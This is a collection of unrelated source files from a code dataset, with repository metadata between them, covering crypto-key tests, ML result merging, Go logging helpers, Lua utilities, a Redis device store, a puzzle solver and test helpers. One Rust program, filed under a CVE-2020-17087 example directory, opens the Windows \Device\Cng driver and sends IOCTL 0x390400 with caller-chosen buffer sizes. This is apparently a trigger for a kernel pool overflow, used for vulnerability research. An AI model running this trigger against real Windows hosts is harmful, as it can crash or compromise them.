}
#[cfg(test)]
mod test {
use super::*;
use core::str::FromStr;
use rand_core::RngCore;
#[test]
fn secret_key() {
let mut bytes = [0u8; 32];
rand::thread_rng().fill_bytes(&mut bytes);
let sk = SecretKey::from_slice(&bytes[..]).unwrap();
let scalar = Scalar::from(sk);
assert_eq!(&sk[..], scalar.to_bytes().as_ref());
}
#[test]
fn public_key() {
let pk = PublicKey::from_str("0479BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8").unwrap();
let point = Point::from(pk);
assert_eq!(pk.serialize().as_ref(), point.to_bytes().as_ref());
}
}
| 25.325 | 180 | 0.607601 | 3.109375 |
e7fca20cce05d1364eee53a17bec476012eb661d | 2,177 | py | Python | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-12T18:00:50.000Z | 2020-12-19T23:49:16.000Z | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | null | null | null | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-10T22:35:01.000Z | 2020-01-15T08:56:53.000Z | #------------------------------------------
# this script combine result of different
# nets and report final result
#------------------------------------------
import sys
import numpy as np
from util import pickle, unpickle
def evaluate_result( result, text ):
# pre-condition check
num_batches = len( result['labels'] )
assert( num_batches == len(result['labels']) )
# compute error
num_cases = 0
num_wrong = 0
for ii in range( num_batches ):
act_index = result['labels'][ii]
num_cases_ii = act_index.shape[0]
assert( num_cases_ii == result['preds'][ii].shape[0] )
num_cases += num_cases_ii
pred_index = np.argmax( result['preds'][ii], 1 )
for jj in range( num_cases_ii ):
if pred_index[jj] != act_index[jj]:
num_wrong += 1
print text + "----Testing Error: %2.4f" % ( 1.0 *num_wrong / num_cases )
return ( 1.0 *num_wrong / num_cases )
def main():
num_args = len(sys.argv)
# load result from file
num_nets = num_args - 1
assert( num_nets > 0 )
errors = []
# 0th net
# result['labels']
# result['preds']
result = unpickle( sys.argv[1] )
errors.append( evaluate_result( result, sys.argv[1] ) )
num_batches = len( result['labels'] )
#import pdb; pdb.set_trace()
# collet all results
for ii in range( num_nets - 1 ):
result_ii = unpickle( sys.argv[ii+2] )
# evaluate result_ii
errors.append( evaluate_result( result_ii, sys.argv[ii+2] ) )
# check num of batches is consistant
num_batches_ii = len( result_ii['labels'] )
for jj in range( num_batches ):
# check label is consistant
assert( np.array_equal(
result_ii['labels'][jj], result['labels'][jj] ) )
# nc result['pred'][jj]
result['preds'][jj] += result_ii['preds'][jj]
pickle( 'combine_result', result )
# classifier mean/std accuracy
errors = np.array( errors )
#import pdb; pdb.set_trace()
print "mean: " , str(100*np.mean( errors )) , " std: " , str(100*(np.std( errors )))
# evaluate result
evaluate_result( result, "After combine" )
if __name__ == "__main__":
main()
| 30.661972 | 87 | 0.592559 | 3.546875 |
a1795f55a384b6138d1e30093e3e6ef7447da5f8 | 2,266 | go | Go | pkg/assert/assert.go | scottcagno/storage | e54fed254539aebc0588d0a736faa69dc1bfbf27 | [
"BSD-3-Clause"
] | 1 | 2021-12-11T22:32:06.000Z | 2021-12-11T22:32:06.000Z | pkg/assert/assert.go | scottcagno/storage | e54fed254539aebc0588d0a736faa69dc1bfbf27 | [
"BSD-3-Clause"
] | null | null | null | pkg/assert/assert.go | scottcagno/storage | e54fed254539aebc0588d0a736faa69dc1bfbf27 | [
"BSD-3-Clause"
] | null | null | null | package assert
import "log"
func AssertTrue(isTrue bool) {
if isTrue == true {
log.Printf("assert true: condition=%t", isTrue)
}
}
func AssertFalse(isFalse bool) {
if isFalse == false {
log.Printf("assert false: condition=%t", isFalse)
}
}
func AssertTrueMsg(isTrue bool, msg string) {
if isTrue == true {
log.Printf("%s, condition=%t", msg, isTrue)
}
}
func AssertFalseMsg(isFalse bool, msg string) {
if isFalse == false {
log.Printf("%s, condition=%t", msg, isFalse)
}
}
func AssertIfErr(err error) {
AssertIfErrMsg(err, "error")
}
func AssertIfErrMsg(err error, msg string) {
if err != nil {
log.Printf("%s %+v", msg, err)
}
}
func InfoIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Printf("%s, condition=%t", msg, isTrue)
}
}
func InfoIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Printf("%s, condition=%t", msg, isFalse)
}
}
func InfoIfErr(err error) {
InfoIfErrMsg(err, "error")
}
func InfoIfErrMsg(err error, msg string) {
if err != nil {
log.Printf("%s %+v", msg, err)
}
}
func WarnIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Printf("%s, condition=%t", msg, isTrue)
}
}
func WarnIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Printf("%s, condition=%t", msg, isFalse)
}
}
func WarnIfErr(err error) {
WarnIfErrMsg(err, "error")
}
func WarnIfErrMsg(err error, msg string) {
if err != nil {
log.Printf("%s %+v", msg, err)
}
}
func PanicIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Panicf("%s, condition=%t", msg, isTrue)
}
}
func PanicIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Panicf("%s, condition=%t", msg, isFalse)
}
}
func PanicIfErr(err error) {
PanicIfErrMsg(err, "error")
}
func PanicIfErrMsg(err error, msg string) {
if err != nil {
log.Panicf("%s %+v", msg, err)
}
}
func FailIfTrue(isTrue bool, msg string) {
if isTrue == true {
log.Fatalf("%s, condition=%t", msg, isTrue)
}
}
func FailIfFalse(isFalse bool, msg string) {
if isFalse == false {
log.Fatalf("%s, condition=%t", msg, isFalse)
}
}
func FailIfErr(err error) {
if err != nil {
log.Fatalf("error %+v", err)
}
}
func FailIfErrMsg(err error, msg string) {
if err != nil {
log.Fatalf("%s %+v", msg, err)
}
}
| 17.703125 | 51 | 0.641218 | 3.3125 |
0bf3bd3ec3ad4b49f3d757ffb24025804e0d9efa | 1,077 | js | JavaScript | src/logic.js | j2ieu/dollars-to-cents | 7d4a507034fc5e746a970464b4558e571339260a | [
"MIT"
] | null | null | null | src/logic.js | j2ieu/dollars-to-cents | 7d4a507034fc5e746a970464b4558e571339260a | [
"MIT"
] | null | null | null | src/logic.js | j2ieu/dollars-to-cents | 7d4a507034fc5e746a970464b4558e571339260a | [
"MIT"
] | null | null | null | const currencyInput = document.getElementById('money-input');
const pennyResult = document.getElementById('penny-result');
const nickelResult = document.getElementById('nickel-result');
const dimeResult = document.getElementById('dime-result');
const quarterResult = document.getElementById('quarter-result');
function convertDollarsToCents(val) {
let cents = Number(val);
if (Number.isSafeInteger(cents) ||
(Number.isSafeInteger(cents) === false && cents)) {
cents *= 100;
} else {
// default case
cents = 100;
}
return cents;
}
currencyInput.addEventListener('input', (e) => {
let cents = convertDollarsToCents(e.target.value);
let quarter = Math.floor(cents/25);
cents%=25;
let dime = Math.floor(cents/10);
cents%=10;
let nickel = Math.floor(cents/5);
cents%=5;
let penny = Math.floor(cents);
pennyResult.innerText = `1 x ${penny}`;
nickelResult.innerText = `5 x ${nickel}`;
dimeResult.innerText = `10 x ${dime}`;
quarterResult.innerHTML = `25 x ${quarter}`;
}) | 28.342105 | 64 | 0.655525 | 3.015625 |
358996e0c9c7881c6f8966b5ee533d9f4ebd63f1 | 2,994 | lua | Lua | laia/util/mem.lua | git22abhishek/Laia | 1a4afa40f08f91f33d0d47a1d89b106091ad076a | [
"MIT"
] | 137 | 2016-12-15T18:51:59.000Z | 2022-03-25T06:41:02.000Z | laia/util/mem.lua | git22abhishek/Laia | 1a4afa40f08f91f33d0d47a1d89b106091ad076a | [
"MIT"
] | 32 | 2016-12-15T18:50:54.000Z | 2022-03-23T17:13:27.000Z | laia/util/mem.lua | jpuigcerver/Laia | 1a4afa40f08f91f33d0d47a1d89b106091ad076a | [
"MIT"
] | 68 | 2016-12-17T01:27:44.000Z | 2022-03-23T08:44:35.000Z | laia = laia or {}
laia.mem = {}
local _cfg = {
monitor_interval = 0,
monitor_started = false
}
--[[
Function that returns the GPU memory used by the calling process.
First, it tries to use the nvidia-smi command to get the exact number of
memory used by the calling process.
If this information is not available, it uses cutorch.getMemoryUsage().
NOTE: This will only work on *nix systems, since it relies on /proc/self/stat,
nvidia-smi and gawk.
--]]
local _PID = io.open('/proc/self/stat', 'r'):read('*number')
local _TO_MB = { KiB = 1024, MiB = 1, GiB = 1024, TiB = 1024 * 1024 }
local _CMD = ([[nvidia-smi | gawk '{
if ($2 == "Processes:") { PF=1; }
else if (PF && $3 == %d && match($(NF - 1), /^([0-9]+)(.iB)$/, A)) {
if (A[2] == "KiB") S += A[1] / 1024;
else if (A[2] == "MiB") S += A[1] * 1;
else if (A[2] == "GiB") S += A[1] * 1024;
else if (A[2] == "TiB") S += A[1] * 1024 * 1024;
}
}END{ if (S > 0) print S; }']]):format(_PID)
function laia.mem.getCurrentGPUMemory()
local nvidia_smi = io.popen(_CMD)
local gpuMemory = (nvidia_smi ~= nil and nvidia_smi:read('*number')) or nil
if not gpuMemory and cutorch ~= nil then
local freeMemory, totalMemory = cutorch.getMemoryUsage()
gpuMemory = (totalMemory - freeMemory) / (1024 * 1024)
end
return (gpuMemory or 0)
end
--[[
Function that returns the resident CPU memory used by the calling process.
We only monitor the resident size, since this is the actually amount that we
care about (i.e. Lua uses an humongous amount of virtual memory).
NOTE: This will only work on *nix systems, since it relies on getconf and
/proc/self/statm.
]]--
local _PAGE_SIZE = io.popen('getconf PAGE_SIZE'):read('*number')
function laia.mem.getCurrentCPUMemory()
local statmf = io.open('/proc/self/statm', 'r')
statmf:read('*number') -- Ignore VmSize
local cpuMemory = statmf:read('*number') * _PAGE_SIZE / (1024 * 1024)
statmf:close()
return cpuMemory
end
local _maxCPUMemory, _maxGPUMemory = 0, 0
function laia.mem.getMaxCPUMemory()
_maxCPUMemory = math.max(laia.mem.getCurrentCPUMemory(), _maxCPUMemory)
return _maxCPUMemory
end
function laia.mem.getMaxGPUMemory()
_maxGPUMemory = math.max(laia.mem.getCurrentGPUMemory(), _maxGPUMemory)
return _maxGPUMemory
end
function laia.mem.registerOptions(parser, advanced)
advanced = advanced or false
if alarm then
parser:option(
'--memory_monitor_interval',
'If n>0, monitorizes the memory usage every n seconds.',
_cfg.monitor_interval, laia.toint)
:argname('<n>')
:bind(_cfg, 'monitor_interval')
:advanced(advanced)
end
end
wrequire('alarm')
local function _alarmMaxMemory()
_maxCPUMemory = laia.mem.getMaxCPUMemory()
_maxGPUMemory = laia.mem.getMaxGPUMemory()
alarm(_cfg.monitor_interval)
end
function laia.mem.startMonitor()
if alarm and not _cfg.monitor_started and _cfg.monitor_interval > 0 then
alarm(_cfg.monitor_interval, _alarmMaxMemory)
end
end
| 32.901099 | 80 | 0.684035 | 3.15625 |
77926bf6de937e990e2e914e8c9eeb259d4f3175 | 3,830 | rs | Rust | pbrs/src/lib.rs | gaoqiangz/pbni-rs | 0809edd7fcc2d7263d21de9e1a05584c6e249e35 | [
"BSD-2-Clause"
] | 10 | 2021-06-08T01:15:12.000Z | 2022-02-22T09:58:27.000Z | pbrs/src/lib.rs | yishuixuanyuan/pbni-rs | 0809edd7fcc2d7263d21de9e1a05584c6e249e35 | [
"BSD-2-Clause"
] | 1 | 2021-06-09T07:31:04.000Z | 2021-06-10T12:15:16.000Z | pbrs/src/lib.rs | yishuixuanyuan/pbni-rs | 0809edd7fcc2d7263d21de9e1a05584c6e249e35 | [
"BSD-2-Clause"
] | 1 | 2022-02-22T09:57:53.000Z | 2022-02-22T09:57:53.000Z | use pbni::*;
struct RustObject {}
#[nonvisualobject(name = "n_cst_test")]
impl RustObject {
#[constructor]
fn new(session: Session, ctx: ContextObject) -> RustObject { RustObject {} }
#[method(name = "of_Array")]
fn of_array(&mut self, mut arg: Array) -> Result<String> {
arg.set_item_long(&[10], 12333223)?;
let mut s = String::new();
for item in arg.iter::<pblong>() {
s += &format!("item: {:?}\n", item);
}
Ok(s)
}
#[method(name = "of_Invoke")]
fn of_invoke(&mut self, mut obj: Object) -> Result<String> {
let rv = obj.invoke_method("of_Test", pbargs!["abcd", 123])?;
Ok(rv)
}
}
struct ParentObject {
session: Session,
ctx: ContextObject,
foo: Option<PBString>
}
impl ParentObject {
fn context(&self) -> &ContextObject { &self.ctx }
fn context_mut(&mut self) -> &mut ContextObject { &mut self.ctx }
}
#[nonvisualobject(name = "n_cst_parent")]
impl ParentObject {
#[constructor]
fn new_pbobject(session: Session, ctx: ContextObject) -> ParentObject {
ParentObject {
session,
ctx,
foo: None
}
}
#[method(overload = 1)]
fn of_test<'a>(&mut self, session: Session, a: &'a PBStr, b: Option<&'a PBStr>) -> &'a PBStr {
let invoker = session.begin_invoke_function(("MessageBox", "ISS")).unwrap();
invoker.arg(0).set_str("title");
invoker.arg(1).set_str("content");
invoker.invoke();
if let Some(b) = b {
b
} else {
a
}
}
#[method(name = "of_hello", overload = 1)]
fn hello(&self, arg: String, b: Option<String>) -> String { format!("hello {},{:?}", arg, b) }
//fn of_hello2(&mut self, a: String, b: String) -> String { format!("hello {}, {}", a, b) }
#[method(name = "of_foo")]
fn of_foo(&self, obj: &Self) -> Result<String> { Ok(format!("fooxxx {:?}", obj.foo)) }
#[method(name = "of_SetFoo")]
fn of_SetFoo(&mut self, arg: &PBStr) -> bool {
self.foo = Some(arg.to_owned());
true
}
#[method(name = "of_trigger")]
fn trigger(&mut self, arg: &PBStr) -> Result<String> {
self.ontest(arg);
let eid = self.ctx.get_event_id(("ontest", "LS"));
let mid = self.ctx.get_method_id("of_test");
Ok(format!("eid: {:?}, mid: {:?}", eid, mid))
}
#[event(name = "ontest")]
fn ontest(&mut self, arg: &PBStr) -> Result<pblong> {}
}
struct ChildObject {
parent: ParentObject
}
#[nonvisualobject(name = "n_cst_child", inherit = "parent")]
impl ChildObject {
#[constructor]
fn new_pbobject(session: Session, ctx: ContextObject) -> ChildObject {
ChildObject {
parent: ParentObject {
session,
ctx,
foo: None
}
}
}
#[method(name = "of_child_hello")]
fn of_hello(&self, arg: String) -> Result<String> { Ok(format!("child hello {}", arg)) }
}
#[global_function(name = "gf_bitor")]
fn bit_or(session: Session, a: pblong, b: pblong) -> pblong { a | b }
#[global_function(name = "gf_Test")]
fn global_function_test(
session: Session,
a: &PBStr,
b: NaiveDate,
c: NaiveTime,
d: NaiveDateTime,
e: Decimal,
f: &[u8]
) -> Result<()> {
let a = a.to_string_lossy();
let b = b.to_string();
let c = c.to_string();
let d = d.to_string();
let e = e.to_string();
let blbStr = String::from_utf8_lossy(f).into_owned();
let mut obj = session.new_object("n_cst_pbtest")?;
obj.set_var_str("is_test", "我爱RUST");
let is_test = obj.get_var_string("is_test");
let invoker = obj.begin_invoke_method("of_test")?;
invoker.arg(0).set_str("call from rust to");
let rv = invoker.invoke()?.get_string();
Ok(())
}
| 29.689922 | 98 | 0.563969 | 3.03125 |
6857ab4e23d3b4665d70f99a5ebeb7eb3c6e221f | 952 | lua | Lua | lua_controllers/table_controller.lua | EMerckx/argos3-experiments | f82e066df5ff1dde155f0b8f07a113ca64ed9425 | [
"MIT"
] | 1 | 2020-08-31T12:52:01.000Z | 2020-08-31T12:52:01.000Z | lua_controllers/table_controller.lua | EMerckx/argos3-experiments | f82e066df5ff1dde155f0b8f07a113ca64ed9425 | [
"MIT"
] | null | null | null | lua_controllers/table_controller.lua | EMerckx/argos3-experiments | f82e066df5ff1dde155f0b8f07a113ca64ed9425 | [
"MIT"
] | null | null | null | -----------------------------------------------------
-- @author Ewout Merckx - <[email protected]>
-----------------------------------------------------
-- global variables
-- initialization
function init()
-- init the index
index = 0
-- set the speed of the robot to zero
robot.wheels.set_velocity(0,0)
end
-- actions for each step
function step()
-- each step, take a different color
create_key_value_table()
end
-- reinitialize the controller
function reset()
end
function destroy()
-- put your code here
end
---------------------------------------------------------------------
-- creates a table, adds some values to it
-- and afterwards, log the content of the table
function create_key_value_table()
t = {
["fb34"] = 12, ["fb02"] = 24,
["fb11"] = 03, ["fb09"] = 19
}
for key,value in pairs(t) do
log(key .. " -> " .. value)
end
log("--------------------")
end
| 19.833333 | 69 | 0.495798 | 3.328125 |
d126662eb2bc5a54fec4f91fb3246ad34de7bcea | 3,459 | rs | Rust | examples/CVE-2020-17087/cng/src/main.rs | cokesme/rewind | ff93325626a15d83bd1a3e5de22daf5e07a26663 | [
"Apache-2.0"
] | 198 | 2021-07-13T20:47:20.000Z | 2022-03-25T05:39:55.000Z | examples/CVE-2020-17087/cng/src/main.rs | cokesme/rewind | ff93325626a15d83bd1a3e5de22daf5e07a26663 | [
"Apache-2.0"
] | 7 | 2021-07-19T13:28:40.000Z | 2021-11-22T10:15:31.000Z | examples/CVE-2020-17087/cng/src/main.rs | cokesme/rewind | ff93325626a15d83bd1a3e5de22daf5e07a26663 | [
"Apache-2.0"
] | 19 | 2021-07-18T14:57:56.000Z | 2022-03-29T03:40:53.000Z |
use std::io::{self, Read};
use std::ffi::CString;
use std::ptr::null_mut;
use winapi::um::fileapi::{CreateFileA, OPEN_EXISTING};
use winapi::um::winnt::{GENERIC_READ, GENERIC_WRITE, HANDLE};
use winapi::um::ioapiset::DeviceIoControl;
use winapi::um::handleapi::{CloseHandle, INVALID_HANDLE_VALUE};
// use winapi::um::errhandlingapi::GetLastError;
use clap::{Clap, crate_version};
use color_eyre::eyre::{Result, WrapErr};
#[derive(Clap, Debug)]
#[clap(version=crate_version!(), author="Damien Aumaitre")]
pub struct Cli {
#[clap(long="data", parse(from_os_str))]
pub data: Option<std::path::PathBuf>,
#[clap(long="size")]
pub size: Option<usize>,
}
fn main() -> Result<()> {
color_eyre::install()?;
let args = Cli::parse();
let device = CString::new("\\\\.\\GLOBALROOT\\Device\\Cng").wrap_err("Failed to create cstring")?;
let h_cng = validate_handle(unsafe {
CreateFileA(device.as_ptr(),
GENERIC_READ | GENERIC_WRITE,
0,
null_mut(),
OPEN_EXISTING,
0,
null_mut())
}).wrap_err("Failed to open handle to \\\\Device\\Cng")?;
println!("opened \\Device\\Cng, handle: {:?}", h_cng);
let ioctl = 0x390400;
let mut output = vec![0u8; 8];
let mut bytes = 0;
let mut input = match args.data {
Some(path) => {
let mut file = std::fs::File::open(path)?;
let mut input = Vec::new();
file.read_to_end(&mut input)?;
input
}
None => {
let size = args.size.unwrap_or(8);
vec![0u8; size]
}
};
match args.size {
Some(size) => {
input.resize(size, 0);
}
None => ()
}
println!("will send {:x} bytes to device", input.len());
let status = cvt(unsafe {
DeviceIoControl(h_cng,
ioctl,
input.as_mut_ptr() as *mut _,
input.len() as u32,
output.as_mut_ptr() as *mut _,
output.len() as u32,
&mut bytes,
null_mut())
});
println!("sent ioctl, result is {:x}", bytes);
println!("output: {:#x?}", &output);
match status {
Ok(_) => {
}
Err(err) => {
println!("got error: {:?}", err);
}
}
unsafe {
CloseHandle(h_cng);
}
Ok(())
}
fn cvt(i: i32) -> io::Result<i32> {
if i == 0 {
Err(io::Error::last_os_error())
} else {
Ok(i)
}
}
fn validate_handle(handle: HANDLE) -> io::Result<HANDLE> {
if handle == INVALID_HANDLE_VALUE {
Err(io::Error::new(io::ErrorKind::Other, "Handle is invalid"))
} else {
Ok(handle)
}
}
// int main() {
// HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
// GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
// if (hCng == NULL) {
// printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
// return 1;
// }
// printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);
// BOOL Status = DeviceIoControl(
// hCng,
// 0x390400,
// IoctlData,
// IoctlSize,
// &OutputBuffer,
// sizeof(OutputBuffer),
// &BytesReturned,
// NULL
// );
// printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx, BytesReturned: %lx\n", Status, OutputBuffer, BytesReturned);
// HeapFree(GetProcessHeap(), 0, IoctlData);
// CloseHandle(hCng);
| 23.530612 | 120 | 0.539751 | 3.03125 |
bd05ee50605573f5b44d7c3173638366e41c4c97 | 5,887 | rs | Rust | src/bin/day19.rs | pierd/advent-of-code-2018 | c2bef61e2809d5ce1e8ffa1246a9723e2b967861 | [
"MIT"
] | null | null | null | src/bin/day19.rs | pierd/advent-of-code-2018 | c2bef61e2809d5ce1e8ffa1246a9723e2b967861 | [
"MIT"
] | null | null | null | src/bin/day19.rs | pierd/advent-of-code-2018 | c2bef61e2809d5ce1e8ffa1246a9723e2b967861 | [
"MIT"
] | null | null | null | use std::str::FromStr;
#[derive(Clone, Copy, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
enum Arg {
Register,
Immediate,
}
impl Arg {
fn from_char(c: char) -> Option<Self> {
match c {
'r' => Some(Self::Register),
'i' => Some(Self::Immediate),
_ => None,
}
}
fn get(&self, regs: &[usize; 6], num: usize) -> usize {
match self {
Arg::Register => regs[num],
Arg::Immediate => num,
}
}
}
#[derive(Clone, Copy, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
enum Opcode {
Add(Arg),
Mul(Arg),
Set(Arg),
Gt(Arg, Arg),
Eq(Arg, Arg),
}
impl FromStr for Opcode {
type Err = ();
fn from_str(s: &str) -> Result<Self, Self::Err> {
let arg = |c| Arg::from_char(c).ok_or(());
let mut chars = s.chars();
let mut next_char = || chars.next();
match (next_char(), next_char(), next_char(), next_char()) {
(Some('a'), Some('d'), Some('d'), Some(c)) => Ok(Opcode::Add(arg(c)?)),
(Some('m'), Some('u'), Some('l'), Some(c)) => Ok(Opcode::Mul(arg(c)?)),
(Some('s'), Some('e'), Some('t'), Some(c)) => Ok(Opcode::Set(arg(c)?)),
(Some('g'), Some('t'), Some(c1), Some(c2)) => Ok(Opcode::Gt(arg(c1)?, arg(c2)?)),
(Some('e'), Some('q'), Some(c1), Some(c2)) => Ok(Opcode::Eq(arg(c1)?, arg(c2)?)),
_ => Err(()),
}
}
}
#[derive(Clone, Copy, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
struct Instruction {
opcode: Opcode,
args: [usize; 3],
}
impl FromStr for Instruction {
type Err = ();
fn from_str(s: &str) -> Result<Self, Self::Err> {
let mut parts = s.split(' ');
let opcode: Opcode = parts.next().unwrap().parse()?;
let args = [
parts.next().unwrap().parse().map_err(|_| ())?,
parts.next().unwrap().parse().map_err(|_| ())?,
parts.next().unwrap().parse().map_err(|_| ())?,
];
Ok(Self { opcode, args })
}
}
impl Instruction {
fn execute(&self, regs: &mut [usize; 6]) {
regs[self.args[2]] = match self.opcode {
Opcode::Add(arg) => regs[self.args[0]] + arg.get(regs, self.args[1]),
Opcode::Mul(arg) => regs[self.args[0]] * arg.get(regs, self.args[1]),
Opcode::Set(arg) => arg.get(regs, self.args[0]),
Opcode::Gt(arg1, arg2) => {
if arg1.get(regs, self.args[0]) > arg2.get(regs, self.args[1]) {
1
} else {
0
}
}
Opcode::Eq(arg1, arg2) => {
if arg1.get(regs, self.args[0]) == arg2.get(regs, self.args[1]) {
1
} else {
0
}
}
}
}
}
fn parse(input: &str) -> (usize, Vec<Instruction>) {
let mut lines = input.lines();
let first_line = lines.next().unwrap();
(
first_line
.strip_prefix("#ip ")
.unwrap()
.parse::<usize>()
.unwrap(),
lines
.map(|line| line.parse::<Instruction>().unwrap())
.collect::<Vec<Instruction>>(),
)
}
fn execute_zeroed(ip_idx: usize, instructions: &[Instruction]) -> [usize; 6] {
execute(Default::default(), ip_idx, instructions)
}
fn execute(mut regs: [usize; 6], ip_idx: usize, instructions: &[Instruction]) -> [usize; 6] {
while let Some(instr) = instructions.get(regs[ip_idx]) {
instr.execute(&mut regs);
regs[ip_idx] += 1;
}
regs
}
fn hacked_calc(c: usize) -> usize {
let mut a = 0;
for b in 1..=c {
if c % b == 0 {
a += c / b;
}
}
a
}
fn main() {
let (ip_idx, mut instructions) = parse(include_str!("../../inputs/day19.txt"));
let regs = execute_zeroed(ip_idx, &instructions);
println!("Part 1: {}", regs[0]);
// exit after initial processing and used handcrafted implementation instead
instructions[1] = Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [100, 100, ip_idx],
};
let regs = execute([1, 0, 0, 0, 0, 0], ip_idx, &instructions);
println!("Part 2: {}", hacked_calc(regs[2]));
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_parse_sample() {
assert_eq!(
parse(include_str!("../../inputs/day19-example.txt")),
(
0,
vec![
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [5, 0, 1]
},
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [6, 0, 2]
},
Instruction {
opcode: Opcode::Add(Arg::Immediate),
args: [0, 1, 0]
},
Instruction {
opcode: Opcode::Add(Arg::Register),
args: [1, 2, 3]
},
Instruction {
opcode: Opcode::Set(Arg::Register),
args: [1, 0, 0]
},
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [8, 0, 4]
},
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [9, 0, 5]
},
]
)
)
}
#[test]
fn test_execute_sample() {
let (ip_idx, instructions) = parse(include_str!("../../inputs/day19-example.txt"));
let regs = execute_zeroed(ip_idx, &instructions);
assert_eq!(regs[0], 7);
}
}
| 29.732323 | 93 | 0.449465 | 3.25 |
cba8aa1f2023ccab6db26eed04efb0a4f1770e61 | 2,794 | go | Go | core/handler/device/store.go | Wcctnoam/dockerttn | 20ac410081e533cbbfe606b983cd303bfaed2bee | [
"MIT"
] | 1 | 2017-09-15T23:28:48.000Z | 2017-09-15T23:28:48.000Z | core/handler/device/store.go | SH-Paek/ttn | 3ec0bdc33316e6d383f699c884b1149326a608e7 | [
"MIT"
] | null | null | null | core/handler/device/store.go | SH-Paek/ttn | 3ec0bdc33316e6d383f699c884b1149326a608e7 | [
"MIT"
] | null | null | null | // Copyright © 2017 The Things Network
// Use of this source code is governed by the MIT license that can be found in the LICENSE file.
package device
import (
"fmt"
"time"
"github.com/TheThingsNetwork/ttn/core/storage"
"github.com/TheThingsNetwork/ttn/utils/errors"
"gopkg.in/redis.v5"
)
// Store interface for Devices
type Store interface {
List() ([]*Device, error)
ListForApp(appID string) ([]*Device, error)
Get(appID, devID string) (*Device, error)
Set(new *Device, properties ...string) (err error)
Delete(appID, devID string) error
}
const defaultRedisPrefix = "handler"
const redisDevicePrefix = "device"
// NewRedisDeviceStore creates a new Redis-based Device store
func NewRedisDeviceStore(client *redis.Client, prefix string) *RedisDeviceStore {
if prefix == "" {
prefix = defaultRedisPrefix
}
store := storage.NewRedisMapStore(client, prefix+":"+redisDevicePrefix)
store.SetBase(Device{}, "")
return &RedisDeviceStore{
store: store,
}
}
// RedisDeviceStore stores Devices in Redis.
// - Devices are stored as a Hash
type RedisDeviceStore struct {
store *storage.RedisMapStore
}
// List all Devices
func (s *RedisDeviceStore) List() ([]*Device, error) {
devicesI, err := s.store.List("", nil)
if err != nil {
return nil, err
}
devices := make([]*Device, 0, len(devicesI))
for _, deviceI := range devicesI {
if device, ok := deviceI.(Device); ok {
devices = append(devices, &device)
}
}
return devices, nil
}
// ListForApp lists all devices for a specific Application
func (s *RedisDeviceStore) ListForApp(appID string) ([]*Device, error) {
devicesI, err := s.store.List(fmt.Sprintf("%s:*", appID), nil)
if err != nil {
return nil, err
}
devices := make([]*Device, 0, len(devicesI))
for _, deviceI := range devicesI {
if device, ok := deviceI.(Device); ok {
devices = append(devices, &device)
}
}
return devices, nil
}
// Get a specific Device
func (s *RedisDeviceStore) Get(appID, devID string) (*Device, error) {
deviceI, err := s.store.Get(fmt.Sprintf("%s:%s", appID, devID))
if err != nil {
return nil, err
}
if device, ok := deviceI.(Device); ok {
return &device, nil
}
return nil, errors.New("Database did not return a Device")
}
// Set a new Device or update an existing one
func (s *RedisDeviceStore) Set(new *Device, properties ...string) (err error) {
now := time.Now()
new.UpdatedAt = now
key := fmt.Sprintf("%s:%s", new.AppID, new.DevID)
if new.old != nil {
err = s.store.Update(key, *new, properties...)
} else {
new.CreatedAt = now
err = s.store.Create(key, *new, properties...)
}
if err != nil {
return
}
return nil
}
// Delete a Device
func (s *RedisDeviceStore) Delete(appID, devID string) error {
key := fmt.Sprintf("%s:%s", appID, devID)
return s.store.Delete(key)
}
| 24.946429 | 96 | 0.682892 | 3.03125 |
f08d5fe0a3761d545d2f4c637b8ea051f71bf530 | 1,506 | js | JavaScript | lib/custom-commands/waitForClientConnected.js | atobatele/Nightwatch | b3e18debd6ed50d0a5410bec528508b5093a6662 | [
"MIT"
] | 12 | 2015-01-12T14:29:52.000Z | 2020-12-25T16:12:00.000Z | lib/custom-commands/waitForClientConnected.js | atobatele/Nightwatch | b3e18debd6ed50d0a5410bec528508b5093a6662 | [
"MIT"
] | 3 | 2015-01-27T00:20:43.000Z | 2018-07-31T02:10:45.000Z | lib/custom-commands/waitForClientConnected.js | atobatele/Nightwatch | b3e18debd6ed50d0a5410bec528508b5093a6662 | [
"MIT"
] | 11 | 2015-01-27T00:20:52.000Z | 2021-01-26T13:39:31.000Z | var util = require('util');
var events = require('events');
function WaitFor() {
events.EventEmitter.call(this);
this.startTime = null;
}
util.inherits(WaitFor, events.EventEmitter);
WaitFor.prototype.command = function (element, ms, msg) {
this.startTime = new Date().getTime();
var self = this;
var message;
if (typeof ms !== 'number') {
ms = 500;
}
this.check(element, function (result, elapsedMs) {
if (result) {
var successMsg = msg || 'Video stream "%s" was connected in %s ms.';
message = util.format(successMsg, element, elapsedMs - self.startTime);
} else {
message = util.format('Video stream "%s" was not connected in %s ms.', element, ms);
}
self.client.assertion(result, null, null, message, true);
self.emit('complete');
}, ms);
return this;
};
